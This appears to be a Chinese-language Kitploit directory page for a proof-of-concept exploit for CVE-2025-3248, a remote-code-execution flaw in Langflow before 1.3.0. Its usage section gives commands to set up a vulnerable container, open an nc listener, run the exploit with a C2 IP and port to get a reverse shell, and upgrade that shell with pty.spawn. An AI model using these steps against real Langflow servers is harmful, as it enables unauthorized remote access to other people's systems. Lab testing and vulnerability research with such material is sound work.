Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-3248 — 用于在 Langflow 版本 <1.3.0 中实现 RCE 的 PoC | Kitploit
工具/GitHubGitHub/wand3rlust/cve-2025-3248
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制Payload 开发
GitHubwand3rlust/cve-2025-3248

CVE-2025-3248

用于在 Langflow 版本 <1.3.0 中实现 RCE 的 PoC

查看仓库
8个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-3248

简介

Langflow 1.3.0 之前的版本在 /api/v1/validate/code 端点中通过 Python exec() 函数存在未经验证的代码注入漏洞。 此漏洞利用程序通过该漏洞建立反向 shell 连接。

使用方法

配置

root@kitploit:~
git clone https://github.com/wand3rlust/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt

漏洞应用

root@kitploit:~
docker pull langflowai/langflow:1.1.4
docker run -p 7860:7860 langflowai/langflow:1.1.4

运行

root@kitploit:~
# 终端 1
nc -nvlp <C2_PORT>

# 终端 2
python3 cve-2025-3248.py <TARGET_URL> <C2_IP> <C2_PORT>

例如:python3 cve-2025-3248.py http://10.10.10.1:7860 10.0.13.37 1337

注意:为了将 shell 升级为 TTY,请在获得 shell 后执行以下命令。

python -c 'import pty; pty.spawn("/bin/bash")'

演示

演示

参考

  • 公告:https://nvd.nist.gov/vuln/detail/CVE-2025-3248
  • GitHub:https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7
  • 原始漏洞利用:https://www.exploit-db.com/exploits/52262
下载工具